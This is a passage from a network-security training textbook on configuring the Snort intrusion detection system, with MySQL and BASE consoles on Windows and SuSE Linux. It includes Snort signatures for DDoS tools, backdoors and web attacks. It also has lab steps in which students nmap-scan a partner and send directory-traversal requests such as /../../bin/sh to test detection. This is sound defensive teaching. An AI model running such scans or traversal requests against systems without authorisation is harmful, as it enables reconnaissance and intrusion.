Walking through this rule from the beginning: This is an alert rule, looking at
TCP as the protocol. It is designed to alert on traffic from the external network on
any port to the machine at 192.168.10.1 on port 80. There is a simple message
that states Sample web access alert, and the classtype has been dened as the
built-in web-application-activity. As a reference for more information, a URL has
been given, www.securitycertied.net, and this is the second revision to the rule,
which has a Snort Rule ID of 10000023
Rule Payload
The core of many IDSes is to examine the actual contents, or payload, of each
packet. Snort can look inside the packet at the payload details to make a determi-
nation about that specic packet. There are many options for Snort here, and in
this lesson, you will focus on a few specic options.
Content Keyword
In Snort, the Content keyword might be the most important of all the keywords.
The Content keyword is how you dene the specic content inside the packets
payload that Snort should look at for rule matching. A critical issue to keep in
mind when dening content is that the data can be either text or binary data.
Your binary data is normally provided in bytecode format, and it is enclosed
within the pipe ( | ) character. Bytecode is a way of representing binary data in
hexadecimal format.
When you enter your content information, if you require the : character, such
as in a URL, use instead the |3a| notation. Using the : character in content
matching will cause problems because the : character is used after each
keyword.
Other Keywords
The nocase keyword simply tells Snort to ignore case when looking into a
packet. Nocase is a modier, used after the content keyword.
The depth keyword tells Snort how far into a packet it should look to nd the
pattern, or content match. If you inserted a value of 5 here, then Snort would
only look for the pattern within the rst 5 bytes of the packet payload. Like
nocase, the depth keyword is a modier used after the content keyword.
The offset keyword tells Snort to ignore a dened number of bytes before look-
ing into a packet. If you inserted a value of 5 here, then Snort would start to look
for the pattern, or content match, after the rst 5 bytes of packet payload. Offset
is also a modier and must be used after the content keyword.
Here is an example rule with the addition of these new options:
Alert tcp $EXTERNAL_NET any -> 192.168.10.1 80 (msg:"Sample web
access alert"; content:"http|3a|//www.securitycertified.net/
test.cgi?id=r00t"; nocase; offset:2; classtype:
web-application-activity; reference:url,http://www.
securitycertified.net; sid:10000025; rev:2;)
This rule is the same as the previous example, with some additions. The rst is
the content keyword. This rule is looking for content that includes a URL with
the id=r00t in the payload. Note that the : character you would normally put in
a URL has been replaced with the |3a| notation. You cannot use the : character
inside the content keyword. This rule is skipping the case sensitivity and is ignor-
ing the rst 2 bytes of each payload. Lastly, as this is a different rule, there is a
different sid assigned.
The content keyword
matches either text or binary
data.
424 Tactical Perimeter Defense
Flow Control
The ow keyword gives you the exibility to dene packets with Snort in
terms of their direction between the client and the server. This option works on
TCP streams, and there are several choices for you, if you wish to use the ow
keyword. The following list identies the ow control options, with a brief com-
ment about each option:
to_client: This matches a server response to a client.
to_server: This matches a request from a client to a server.
from_client: This matches packets sent from the client. Similar function as
the to_server option.
from_server: This matches packets sent from the server. Similar function as
the to_client option.
only_stream: This matches only on reassembled stream packets.
no_stream: This does not match reassembled stream packets.
established: This matches on packets that are part of an established TCP
connection.
stateless: This matches packets without regard of state.
While there is no one correct way to write a Snort rule, there are some general
guidelines that will make your writing more efficient and accurate. To start with,
you want to be as precise as possible with your content matching. This will cut
down on false matches and will cut down on the load on your system.
A second guideline is to create rules to match the vulnerability, not the specic
exploit. Writing rules that look for matches to the vulnerability will allow your
IDS to still match traffic, even if an attacker makes a modication to the exploit.
Pre-configured Rules
It is vital that you know how to create rules for Snort, but no one wants to build
something from scratch when it is already available and you can get it with very
little effort. The same thought applies for basic rules for Snort. The default Snort
installation comes with a selection of IDS rules for you to pick through and use,
and there are several more available for download at www.snort.org.
There are several options for you to choose from when you wish to receive Snort
rules. If you need to have real-time rules, with the most current options available,
you must become a subscriber to receive the Sourcere VRT-certied rules. The
Subscriber rules are the ones you need if you are looking to address security
issues as they arise, often with a new rule available within days of a new vulner-
ability being introduced.
The second method to download pre-congured rules is to become a registered
user at www.snort.org. Registered users are able to receive all the latest snort
rules, but the rules are available 30 days after they are made available to
Sourcere subscribers.
The third way to download pre-congured rules from Snort is as an unregistered
user. Unregistered users are able to download the ruleset that is available with
every major Snort release.
Lesson 8: Conguring an IDS 425
In addition to the rules that are available from Snort, there are rules available
from www.bleedingsnort.com The bleedingsnort.com rules are very current and
are submitted from people all over the net. If you need absolute up-to-the-minute,
experimental, and test rules, this is the location to nd them.
In this lesson, you will work with Snort rules that are made available to everyone
(unregistered) from www.snort.org.
TASK 8C-3
Examining Pre-configured Rules
1. Navigate to C:\Tools\Lesson8\Rules.
2. Copy all the .rules les to the C:\Snort\rules folder.
3. Navigate to the C:\Snort\rules folder.
4. Open the folder, and browse through the pre-congured rules. You will
come back to these les in a moment.
Examine Denial of Service Rules
As you can see, there are many very detailed default rules for you to work with.
One section of the pre-congured rules deals with Denial of Service attacks. Here
is a sample rule from this le:
alert tcp $EXTERNAL_NET any -> $HOME_NET 27665
(msg:"DDOS Trin00 Attacker to Master default startup
password"; flow:established,to_server;
content:"betaalmostdone"; reference:arachnids,197;
classtype:attempted-dos; sid:233; rev:3;)
Starting at the beginning of this rule, you can see that it is an alert, matching tcp
as the protocol. Traffic on the external network, on any port going to the internal
network, on port number 27665 is what Snort will be looking at. This rule is
looking for an established TCP connection, with traffic going to the server. The
content is listed as: betaalmostdone. Since this incident would be an attempt at
denial of service, this rule appropriately is given the classtype of attempted-dos,
has a reference you can check the Arachnids database, number 197 (Arachnids
was an incident database, more current data is found on the CVE list), has been
given a Snort rule ID of 233, and this is the third revision of the rule.
426 Tactical Perimeter Defense
TASK 8C-4
Examining DDoS Rules
1. Navigate to the C:\Snort\rules folder.
2. Open the ddos.rules le with WordPad.
3. Based on these rules, what three ports does the DDoS tool Trin00 uti-
lize?
UDP 31335, TCP 27665, and UDP 27444.
4. Based on these rules, what icmp_id numbers does the DDoS tool
Stacheldraht utilize?
Icmp_ids: 666, 667, 668, 669, 1000, 6666, 6667.
Examine Backdoor Rules
Just as there are pre-congured rules for Distributed Denial of Service, there are
extensive rules designed for matching backdoor attacks. These rules will gener-
ally be more complex than a DoS rule because the content matching often
requires more information. Here is a sample rule from the backdoor.rules le:
alert tcp $HOME_NET 12345:12346 -> $EXTERNAL_NET any
(msg:"BACKDOOR netbus active";
flow:from_server,established; content:"NetBus";
reference:arachnids,401; classtype:misc-activity;
sid:109; rev:5;)
This rule is an alert looking for matches on the TCP protocol. In this case, it is
traffic from your internal network on port 12345 or 12346 to the external network
on any port. The Netbus server actually resides on the compromised host, in this
case, inside your network. The traffic ow is from the server (compromised host),
and it is an established connection. The content that is being looked for is
NetBus. This alert is characterized as a misc-activity, has a Snort rule ID of 109,
and is the fth revision of the rule.
TASK 8C-5
Examining Backdoor Rules
1. Navigate to the C:\Snort\rules folder.
2. Open the backdoor.rules le with WordPad.
Lesson 8: Conguring an IDS 427
3. Based on this rule set, what service and port are the majority of the
Linux rootkit attempts using?
Telent, on port 23.
4. Is the second Subseven rule with SID 107 looking for an attempt to
place a Trojan on a computer in your network or looking for evidence
that a Trojan has already been placed on a computer in your network?
Looking for evidence that a Trojan is already in the network.
Examine Web Attack Rules
One of the fastest growing areas of attack is on web servers. Since these are
exposed, they are often the targets of attacks from every skill level, from script-
kiddies to more experience attackers. Snort has many rules designed to look for
web attacks. Here is one example rule:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-ATTACKS /etc/shadow access";
flow:to_server,established; content:"/etc/shadow"; nocase;
classtype:web-application-activity; sid:1372; rev:5;)
This rule is an alert, looking at TCP traffic from the external network on any port
to your web servers on your web server ports. The web servers and web server
ports are dened in your variables. The ow of this traffic is to the web server,
and it would be an established connection. The attacker is looking for the /etc/
shadow le on a Linux/UNIX system. Case sensitivity is not taken into
consideration with this rule, it has been given a Snort Rule ID of 1372, and is the
fth revision to the rule. This specic rule is listing the classtype as web-
application-activity, but you might want to consider this potentially a recon event.
TASK 8C-6
Examining Web Attack Rules
1. Navigate to the C:\Snort\rules folder.
2. Open the web-attacks.rules le.
3. Which rule is watching for an attacker adding a user account to the
administrators group?
SID 1357.
4. In SID 1335, an attacker would send the command /bin/kill. What oper-
ating system is the web server likely running?
Linux/UNIX.
5. Many of these rules contain the %20 characters. What does this
mean?
This means that the Snort rule is looking to match a space where the
%20 resides in the content portion of the rule.
If you have an older rule set,
your web attack rules may
vary.
428 Tactical Perimeter Defense
Examine Web IIS Rules
As the Microsoft IIS Web Server grows in popularity, the attacks seem to grow
exponentially. Because of this, there is a ruleset dedicated to rules for the IIS
Server. Here is one example of an IIS Rule:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS
$HTTP_PORTS (msg:"WEB-IIS Directory transversal
attempt"; flow:to_server,established;
content:"..|5C|.."; reference:bugtraq,2218;
reference:cve,1999-0229;
classtype:web-application-attack; sid:974; rev:10;)
This rule addresses a rather famous exploit where a person could simply put in
the URL a line that would give them access to the computer. This is called the
Directory Transversal Attack, where in the URL the attacker uses ../.. in the URL
as part of the attack.
In this rule, the alert is acting on TCP traffic in the direction of the external net-
work on any port towards the web servers on web server ports. The connection
must be established and is in the direction towards the server. The key point in
this rule is the content of ..|5C|.. This would be a double-dot then a / then a
double-dot to the server. Since the rule requires the ASCII conversion, the rule
has the pipe symbol, 5C, then the pipe symbol, as / in ASCII is 5C. This is clas-
sied as a web attack, has a Snort ID of 974, and is the tenth revision of the rule.
TASK 8C-7
Examining IIS Rules
1. Navigate to the C:\Snort\rules folder.
2. Open the web-iis.rules le with WordPad
3. The Code Red exploit has .ida? in the payload. Which SID would you
look up online for more information about the rule to match Code Red
attacks?
SID 1243.
4. The Code Red II exploit attempted to use /root.exe and has a Snort Rule
ID of 1256. If you wanted to learn more about this exploit, what URL
would you use to nd more information about Code Red?
www.cert.org/advisories/CA-2001-19.html
Lesson 8: Conguring an IDS 429
Topic 8D
Configuring Snort to Use a Database
Snort Output Plug-ins
By now you can see that Snort will be able to generate large volumes of data in
the form of alerts, logs, and so on. Reading this data on screen while Snort is
running isnt realistic, so you will need to use some means of reading the data
that Snort collects.
Snort provides several output options through the use of output plug-ins. In this
section, you will congure Snort to output information to a MySQL database.
Snort is not limited to using a MySQL database, that is simply the choice for this
lesson. You could output Snort to Oracle, SQL Server, any UNIX ODBC-
compliant database, and so on.
In addition to sending logs and alerts to a database, you could instruct Snort to
send this data to a remote logging server via Syslog. This is the command to out-
put locally to a Syslog format: output alert_syslog: LOG_LOCAL2
LOG_ALERT. If you wish to send this data to a remote server, you will need to
replace the local information with the remote server information.
Another option, if you desire, is to output directly in a binary format that
tcpdump works well with. This is the command to output in tcpdump format:
output log_tcpdump: snort.dump
In the snort.conf le, you will congure the type of output you wish to use.
Remember, the output is detailed in the snort.conf le, not with a command-line
switch. For this lesson, you will be conguring the system to output to a
database. The following example shows what a basic entry for database logging
would like in the snort.conf le:
output database: log, mysql, user=username
password=password dbname=snortdb host=localhost
Configure Snort to Use a Database
Since you are going to congure a MySQL database to accept data, you must
inform Snort about the database and give it the information required to make the
connection. In this following task, you will recongure the snort.conf le to
include the output to the database.
430 Tactical Perimeter Defense
TASK 8D-1
Editing Snort.Conf
1. Navigate to the C:\Snort\etc folder.
2. Open the Snort.conf le with WordPad.
3. Scroll down in the le to the Output database plug-in section.
4. Add the following line:
Output database: log, mysql, user=snort password=snortpass
dbname=snortdb1 host=localhost
5. Save and close the snort.conf le.
Installing MySQL for Snort
In order for Snort to utilize a database, you must build one. In this lesson you
will work with the freely available and widely popular MySQL database. Keep in
mind that Windows, Snort, and MySQL can take a lot of computing resources on
a busy network, so a dedicated machine with a good processor and lots of
memory would be a good base platform.
TASK 8D-2
Installing MySQL
1. Navigate to the C:\Tools\Lesson8 folder.
2. Double-click the mysql-essentials-5.0.27-win32.msi le.
3. In the Welcome screen, click Next.
4. Select the Custom radio button and click Next.
5. Click the Change button. You are going to install to a location you choose.
6. In the Folder Name text box, type C:\Snort\mysql and click OK, and then
click Next.
7. Verify the install directory location and click Install.
8. Once MySQL is installed, select the Skip Sign-Up radio button and click
Next.
9. Verify that the Congure MySQL Server Now check box is checked, and
click Finish.
10. In the Welcome screen, click Next.
11. Select the Standard Conguration radio button, and click Next.
Lesson 8: Conguring an IDS 431
12. Check the Include BIN Directory In Windows PATH check box, and
click Next. (Note: leave the box checked next to Install As Windows
Service.)
13. In the Root Password and the Conrm text boxes, type and re-type sqlpass
Do not check the box to Enable Root Access or Create An Anonymous
Account, and then click Next.
14. To start the conguration, click Execute, and then click Finish to end the
installation.
With MySQL now installed with the base conguration, you will need to create
the actual database that Snort is going to work with. In the following task, you
will use both the MySQL command line and the Snort command line. Snort
comes with a script to build the database in MySQL, complete with the appropri-
ate tables. This script was generated during the install of Snort. If you recall, you
had the option to dene the database/logging that you would use, and you
selected the option that included support for MySQL.
TASK 8D-3
Creating the Snort Database
1. Navigate to the C:\Snort\schemas directory. Note the le create_mysql.
This is the le you will use to build the database.
2. Choose StartAll ProgramsMySQLMySQL Server 5.0MySQL
Command Line Client.
3. Enter your MySQL root password. Note: This should be sqlpass from
the previous task.
4. Enter create database snortdb1;
5. Enter show databases;
6. Verify that your two new databases are listed.
7. To switch to the new database, enter connect snortdb1;
8. To populate the database, enter source
C:\Snort\schemas\create_mysql
9. To show the tables that were created during the execution of the previous
script, enter show tables;
10. At the mysql> prompt, enter quit;
432 Tactical Perimeter Defense
MySQL User Accounts
MySQL needs several user accounts for the full functionality of this lesson. You
will need to congure the accounts so that MySQL will accept the data that Snort
is sending, and so that later, if you were to use an analysis program such as
BASE (which you will see later), you would need these accounts to connect to
the database to pull the required data.
TASK 8D-4
Creating MySQL User Accounts
1. Choose StartAll ProgramsMySQLMySQL Server 5.0MySQL
Command Line Client.
2. Enter your MySQL root password. Note: This should be sqlpass.
3. At the mysql> prompt, enter show databases;
4. Enter grant INSERT,SELECT,UPDATE on snortdb1.* to
snort identified by snortpass;
5. Enter grant INSERT,SELECT,UPDATE on snortdb1.* to
snort@localhost identified by snortpass;
6. Enter flush privileges;
7. Enter exit;
8. Navigate to the C:\Snort\mysql folder.
9. Right-click my.ini and open the le with WordPad.
10. Change the following line:
Before:
sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_
USER,NO_ENGINE_SUBSTITUTION"
After:
sql-mode="NO_AUTO_CREATE_USER,NO_ENGINE_
SUBSTITUTION"
11. Save and close the my.ini le.
Snort to Database Connectivity
Now that you have a database installed and have congured Snort to communi-
cate with the database, you need to test this connectivity. The following quick
task is a simple loading of the snort.conf le to check to see if the connection to
the database is functional. You do not want to go further in your conguration if
you are unable to get the connection between MySQL and Snort to function.
Lesson 8: Conguring an IDS 433
TASK 8D-5
Testing the New Configuration
1. Open a command prompt.
2. Navigate to the C:\Snort\bin folder.
3. Enter snort -d -e -v -iX (remember to change X to use your net-
work interface as before).
4. Watch to see that Snort is functional and is showing packets on screen.
If you need to generate network traffic, ping a neighbor computer.
5. Press Ctrl+C to end Snort.
6. To see the full Snort system running, enter snort -d -e -v -iX -c
C:\Snort\etc\snort.conf -l C:\Snort\log
7. Press Ctrl+C to stop Snort.
8. To see where Snort made the connection to the database, scroll through the
commands.
Snort as a Service
While it may work for you to manually start and stop Snort to perform the occa-
sional packet capture, in a working environment, you will likely want Snort on
all the time. One way to achieve this is to install Snort as a service in Windows.
The following task will walk you through the steps of adding a service, and then
verify that it starts automatically.
TASK 8D-6
Configuring Snort as a Service
1. Open a command prompt.
2. Navigate to the C:\Snort\bin> folder.
3. At the C:\Snort\bin> prompt, enter snort /SERVICE /INSTALL -c
C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii -iX
(Remember to change X to use your network interface as before.)
You will receive a prompt that the SNORT_SERVICE has been successfully
installed.
4. Close the command prompt.
5. Choose StartAdministrative ToolsServices.
6. In the right pane, scroll down to and double-click the Snort service.
If you receive a winpcap
error, you can try using
winpcap_3_1.exe.
434 Tactical Perimeter Defense
7. In the Startup Type, change the setting from Manual to Automatic.
8. Click Apply.
9. To close the Snort Properties window, click OK. Do NOT click Start at this
time.
10. Close the Services window.
11. To verify that the Snort service starts automatically, restart your server.
12. When the server restarts, log on as Administrator.
13. Right-click the taskbar and choose Task Manager.
14. Select the Processes tab, and verify that both Snort and mysql are
started and running.
15. Select the Snort process, and note the amount of memory that is allo-
cated to Snort. As you can see, Snort is a memory-intensive process.
16. Close the Task Manager.
Topic 8E
Running an IDS on Linux
LAMP On SuSe
While this lesson, up to this point, has focused on the use of Snort, in order to
make the system more functional, you will need a system in place to read, sort,
and view all the data that Snort is able to collect. In the previous section you saw
how to set up Snort to interact with a MySQL database, while running on a Win-
dows system.
In this section, you will congure Linux with the background system to read the
Snort data via a web browser. This requires the building of a LAMP server.
LAMP stands for Linux, Apache, MySQL, and PHP (you may see the P also
refer to Python or Perl, but in this case it is PHP). In addition to the LAMP com-
ponents, you will install nmap, a tool you will use later in the lesson to generate
network scanning traffic.
In SuSe Linux 10, many of the components required to build the environment for
Snort are available and ready for installation. Other components will require you
to connect to the Internet to get the current version. In this lesson, the specic
versions are detailed. Please keep in mind that in the event that you use a differ-
ent version, it is possible, and even likely, that these steps will not work.
Lesson 8: Conguring an IDS 435
TASK 8E-1
Installing LAMP Components
1. Log in to your Linux server as root.
2. From the Computer menu, choose Install Software.
3. In the Software list, scroll down and check the following check boxes:
lamp_server (i586)
nmap (i586)
php5-gd (i586)
php5-mysql (i586)
php5-mysqli (i586)
php5-pear (i586)
snort (i586)
webalizer (i586)
4. Verify that you have checked these components, and click Install.
5. The additional packages that are required for these components to run prop-
erly are listed. Review the list to see how many smaller pieces are
required, and then click Apply.
6. If you are prompted for the Novell media, insert the CD or DVD now, and
click OK. Note: it may take several minutes to install these packages.
7. Once the les have been copied, you will see an Installation Was Successful
prompt. Click Close.
8. Close the Software Installer.
Apache and PHP
One of the critical components you just installed was PHP. PHP is a server-side
scripting language. PHP is used to provide dynamic web page content to end
users, without the end users having any new software to install on their system.
The end user will connect to the server with a web browser, and the PHP script-
ing on the servers side will generate the response to deliver to the end user.
If you manually build your server, meaning if you install these components indi-
vidually on their won versus through the SuSe installer, you will need to
congure Apache to use PHP. This is done by editing the httpd le and adding
the line for your version of PHP. You would also need to edit the PHP congura-
tion le. During the installation, a le called php.ini-dist will be installed, and
you would rename this le to php.ini. In the php.ini le, you need to tell PHP
where to nd the PHP extensions and where to nd a temporary directory. In this
task, since you used the SuSe installer, these steps are taken care of and you will
not need to manually congure the php.ini le.
436 Tactical Perimeter Defense
In the following task, you will turn on your Apache server and verify that PHP is
properly installed and running. If your server does not reply with the test screen,
you must check your installation. Without a functional PHP and Apache Server,
you will not be able to complete the tasks in this topic.
TASK 8E-2
Apache and PHP Test
1. From the Computer menu, choose YaST.
2. On the left side, click System, and then click System Services (Runlevel).
3. Scroll down and highlight apache2.
4. Click Enable, and if you see a pop-up message about dependencies, click
Continue.
5. In the success pop-up, click OK.
6. To close the System Services window, click Finish.
7. To save the Runlevel changes, click Yes.
8. Close YaST.
9. From the Computer menu, choose Firefox.
10. In the address bar, enter http://localhost
11. If your server is running, you will get the message, It works! If not, care-
fully repeat the installation steps.
12. Close the browser, and navigate to the /srv/www/htdocs directory.
13. Inside /srv/www/htdocs, create a new document named info.php
14. Right-click this document and open it with Gedit.
15. Enter <?php phpinfo(); ?> and then save and close the le. (Note
If you made your le using the File Manager, you must right-click and edit
the permissions so that the Others group has read access.)
16. Open the web browser.
17. In the address bar, enter http://localhost/info.php
18. You will see a screen that presents all the local PHP information. This sum-
mary screen details the PHP install on your system.
19. Close the Web Browser.
Lesson 8: Conguring an IDS 437
Enable Snort on Linux
Now that you have veried that your web server is running, and you have veri-
ed that PHP is enabled and functional for your server, you can move on to the
next section. In this section, you will congure Snort and enable MySQL. Previ-
ously, you congured these on Windows, so the steps should be familiar to you.
First, you will congure Snort, then you will enable both Snort and MySQL in
YaST.
The steps to enable these services are critical. If you forget to enable both Snort
and MySQL under System Services, you can expect to run into some errors later
in the topic!
TASK 8E-3
Configure Snort on Linux
1. Open your le browser, and navigate to /etc/snort.
2. To open the le with Gedit, double-click snort.conf.
3. Edit these lines in your snort.conf le:
var HOME_NET 172.X.0.0/16 (replace the X based on your
address in the network)
var EXTERNAL_NET !$HOME_NET
var RULE_PATH /etc/snort/rules
output database: log, mysql, user=snort password=snortpass
dbname=snortdb1 host=localhost
4. Save and close the le.
5. From the Computer menu, choose YaST.
6. Click System, then click System Services (Runlevel).
7. Scroll down, highlight mysql, and click Enable. Click Continue To
Enable The Dependencies, and then click OK.
8. Scroll down and highlight Snort, and click Enable. Note the message
prompt, and click OK.
9. Click Finish, and then click Yes to save the changes to the run levels, and
then close YaST.
Configuring MySQL on Linux
With the basic Snort conguration ready, next you must create the MySQL data-
base for Snort to use. The script for building the database is included in Snort
when Snort is compiled for use with a database. The default installation includes
the scripts for a MySQL database.
438 Tactical Perimeter Defense
Remember that when you work with MySQL, each of your commands end with
the ; character. If your install is not done on the SuSe platform with the soft-
ware installer, the location of your Snort les will likely be different. In this task,
you will assign a password to the root account, create and assign a password to
the snort account, and build the database.
TASK 8E-4
Configuring MySQL for Snort
1. Open a Terminal
2. Enter the following commands (press Enter after each command):
mysql
SET PASSWORD FOR root@localhost=PASSWORD('rootpass');
create database snortdb1;
grant ALL on root.* to snortdb1@localhost;
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snortdb1.*
to snort identified by 'snortpass';
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snortdb1.*
to snort@localhost identified by 'snortpass';
exit
mysql -u root -p
rootpass
connect snortdb1;
source /usr/share/doc/packages/snort/schemas/create_mysql;
show databases;
use snortdb1;
show tables;
3. If you see the table, with 16 rows, you have successfully created the
database and you can proceed. If not, please follow this task again care-
fully; every step must be exact.
4. At the mysql> prompt, enter exit
5. Close the Terminal window.
Connecting Snort to a Database
Now that you have congured Snort to connect to the database, and you have
congured the database to accept the connections from Snort, you should test this
conguration. You do not want to get too far into this conguration only to nd
an error from the beginning.
Note that in the tasks here, you are issuing the full command syntax in Snort to
see the results on screen. In your production environment, you would most likely
not include the option to see this information on screen, as you would have little
use for seeing that information on screen.
In this following task, you will run a test to conrm that Snort can connect to the
database. If you do not make the connection to the database, you must stop here
and go back through the tasks to nd the error. Once connected, you will exit the
Snort process. At this time, do not leave Snort running.
Lesson 8: Conguring an IDS 439
TASK 8E-5
Testing Snort Connectivity to the Database
1. Open a Terminal window.
2. Enter snort -d -e -v -c /etc/snort/snort.conf -l
/var/log/snort
3. It may take a moment, but you should see Snort load and make the connec-
tion to the database. If you get an error message, verify that all the lines
are correct in your snort.conf le and that your MySQL is congured
properly.
4. Press Ctrl+Z to stop Snort. Scroll up to see where Snort made the con-
nection to the database.
5. Once successful, close the Terminal window.
Installing ADOdb and BASE
Since you have congured several components up to this point, now is a good
time to review. First, you installed and congured Apache to start up. You then
congured PHP to work with the server, and veried that PHP is working with a
simple test page. Next, you congured Snort for your system, and congured
MySQL to work with Snort by creating the appropriate database. Lastly, you ran
a connectivity test to ensure that Snort can connect to the MySQL database that
you created.
With those pieces in place, you are ready to install what is called the Basic
Analysis and Security Engine, or BASE for short. You use BASE through your
web browser to analyze the data that Snort is sending to your MySQL database.
The team at www.sourceforge.net describes BASE as follows: BASE is based
on the code from the Analysis Console for Intrusion Databases (ACID) project.
This application provides a web front-end to query and analyze the alerts coming
from a SNORT IDS system. ACID was the original web front-end for Snort
results and has evolved into BASE. ACID is still used by many organizations.
Another component you will need to download is called ADOdb. ADOdb is used
by BASE with PHP to perform the actual queries of the Snort database. Since
PHPs database access abilities are not standardized, there needs to be some
means of access, and this is where ADOdb comes into place.
You will need to download two more parts for this section to be operational.
These les have already been downloaded and are on the SCNS Course CD, the
task will simulate the location you may download les to on your local computer.
If you download new les, be sure you use the exact le names in this task; if
not, it is possible that your BASE console will not function as expected. Here are
the locations for these two les:
http://sourceforge.net/projects/adodb (this is where you can download
ADOdb)
http://sourceforge.net/projects/secureideas (this is where you can download
BASE)
440 Tactical Perimeter Defense
TASK 8E-6
Downloading ADOdb and BASE
1. Open a Terminal window.
2. Enter the following commands:
cd /
mkdir download
cd /download
ls
cd /Tools/Lesson8
ls
cp adodb493a.gz /download
cp base-1.2.7.tar.gz /download
cd /download
ls
With these two les downloaded, you are now ready to install them. The install
steps are straightforward; however, there is one conguration le for BASE that
you will need to congure. This le, called base_conf.php, needs to know where
your adodb is installed and needs to know how to connect to the Snort databse
you made in MySQL. In the following task, you will install these two les and
congure the BASE php le.
TASK 8E-7
Installing ADOdb and BASE
1. Open a Terminal window.
2. Enter the following commands:
cd /download
cp adodb493a.gz /srv/www
cd /srv/www
tar -xvzf adodb493a.gz
rm -rf adodb493a.gz
cd /download
cp base-1.2.7.tar.gz /srv/www/htdocs
cd /srv/www/htdocs
tar -xvzf base-1.2.7.tar.gz
rm -rf base-1.2.7.tar.gz
mv base-1.2.7 base
cd /srv/www/htdocs/base
cp base_conf.php.dist base_conf.php
3. Once you have created the new base_conf.php le by copying it, you can
close the Terminal window.
4. In the le browser, navigate to /srv/www/htdocs/base and open base_conf.
php with Gedit.
Be sure you type these
commands exactly.
Lesson 8: Conguring an IDS 441
5. Edit the le so that the following changes take place:
$BASE_urlpath = /base;
$Dblib_path = /srv/www/adodb/;
$alert_dbname = snortdb1;
$alert_host = localhost;
$alert_port = ;
$aler_user = snort;
$alert_password = snortpass;
6. Save and close the base_conf.php le.
7. Restart your server.
Configuring BASE
You have just about nished with the steps to getting your system operational.
There is one last conguration that is required once the BASE console is running.
In this last task, you will need to tell BASE how to set up the database. Once
this last step is complete, your system will be ready to go.
TASK 8E-8
Configuring BASE
1. Open a web browser.
2. In the address bar, enter http://localhost/base/base_main.php
3. You will receive a message that the underlying database appears to be
incomplete/invalid.
4. Click the Setup Page link.
5. On the next page, click the Create BASE AG button on the right side of
the page. If you get a Security Warning, click Continue.
6. The required items will be successfully created. Click the Main Page link
at the bottom of the page.
7. You are now at the default page of your new BASE console.
This next task is not a requirement specic to the BASE console, but it is
required for remote access to your web server. Later in this lesson, you are going
to generate some events through the web server. In order for a simulated attacker
to be able to connect to your web server, it must be enabled for others to access.
By default, the rewall in your installation does not allow this. In the following
task, you will turn on the HTTP service through the rewall.
442 Tactical Perimeter Defense
TASK 8E-9
Configuring the Firewall to Allow HTTP
1. From the Computer menu, choose YaST.
2. Click Security And Users, and then click Firewall.
3. On the left side, click Allowed Services.
4. From the Service To Allow drop-down list, select HTTP Server.
5. Click the Add button to the right of the drop-down list.
6. Click Next, and then click Accept.
7. Close YaST.
Generating Snort Events
At this time, you have congured Snort, MySQL, PHP, APACHE, ADOdb, and
BASE. However, you likely had no data in your BASE console when you loaded
it because there were no events present to cause a trigger. In the following sec-
tion, you will start Snort, your instructor will generate some simple events, and
you will then view this data in your BASE console.
TASK 8E-10
Generating Portscan Snort Events
Setup: This task requires students to work in pairs.
1. Right-click the desktop and open a Terminal.
2. To start Snort, enter snort -d -e -v -c
/etc/snort/snort.conf -l /var/log/snort
3. Keep the Snort window open.
4. Right-click the desktop and open a second Terminal.
5. Verify that your partner has Snort started.
6. In your second Terminal, replacing a.b.c.d with your partners IP address,
enter
nmap -sS a.b.c.d --system-dns
nmap -sX a.b.c.d --system-dns
nmap -sN a.b.c.d --system-dns
nmap -sF a.b.c.d --system-dns
nmap -O a.b.c.d --system-dns
7. When your partner has nished running these nmap scans, close your
nmap Terminal, and proceed to the next step.
Lesson 8: Conguring an IDS 443
8. In your Snort Terminal, press Ctrl+Z to stop Snort.
9. Open a web browser, and enter http://localhost/base/base_main.php in
the address bar.
10. Note that you will have new Portscan Traffic found (you may need to scroll
down in your window to see this).
11. Scroll down in your browser, and click the Percentage link to the right
of Portscan Traffic.
12. Here you can see the scans that were detected. Click any of the event IDs
on the left side. These will likely start with #0, or something similar, on
your system.
13. Review the details of this event.
14. Keep your Snort Terminal open, keep the BASE console open, and open
a second web browser for the next task.
In the previous task, you generated simple Portscan traffic, which Snort reported
and which you analyzed in your BASE console. In this next task, you will gener-
ate web attack traffic. These will be simple URL requests to your web server. You
will start Snort in your Terminal window, then open a web browser and make
several requests of your partners server. You will then view the results of these
actions in your BASE console.
TASK 8E-11
Generating Web Snort Events
Setup: This task requires students to work in pairs. One student run-
ning the Snort IDS, and the other an attacking Windows
machine. It is suggested to go through the task twice, with
students switching roles the second time through.
1. On the Linux Machine, running Snort, open your Snort Terminal, and
enter snort -d -e -v -c /etc/snort/snort.conf -l
/var/log/snort
2. On the Windows Server 2003 machine, verify that your partner has
started Snort.
3. Open a web browser, and connect to http://your.partners.ip.address.
4. Verify that you see the It works! default page. If you do not see this
message, check that the HTTP service is allowed on the web server.
5. In the web browser, enter the following URL requests. Note: These will be
unsuccessful, which is ne for this task:
http://your.partners.ip.address/../../
http://your.partners.ip.address/../../bin/sh
.
Steps 2 through 6 are to be
done on the Windows Server
2003 machine.
444 Tactical Perimeter Defense
6. Close the web browser.
7. On the Linux machine, running the Snort IDS, switch to your Snort Termi-
nal, and press Ctrl+Z.
8. Open your BASE console.
9. Notice that you now have new alerts, this time they are TCP alerts.
10. Click the percentage next to TCP to analyze the alerts.
11. Answer the following questions:
What is the name of this signature?
(http_inspect) WEBROOT DIRECTORY TRAVERSAL
How can you learn more about this event through BASE?
Click the Snort link next to the name.
What ags were set on this event?
ACK and PSH.
12. Close all open windows.
You have now congured all the components of running a full-edged Network
Intrusion Detection System. The default conguration of Snort uses many differ-
ent rulesets, which you can dene in the snort.conf le. In your environment, you
will need to craft rules for your specic requirements or use the predened
rulesets.
Summary
In this lesson, you identied that there are many different types of IDSes,
and you implemented the worlds favorite free IDSSnort. You used Snort
as a network-based IDS tool that is designed to monitor TCP/IP networks,
looking for suspicious traffic and direct network attacks. You learned that
Snort enables system administrators to collect enough data to make
informed decisions on the best course of action when an intrusion is
detected. You then built a full functional network IDS on Linux, including
the BASE console for alert analysis.
Steps 7 through 12 are to be
done on the Linux IDS
machine.
If you have time, have your
students turn on Snort
again, and then you can
generate some events,
scanning, web events, etc.
Ask your students to
identify what you did by
analyzing their BASE
consoles.
Lesson 8: Conguring an IDS 445
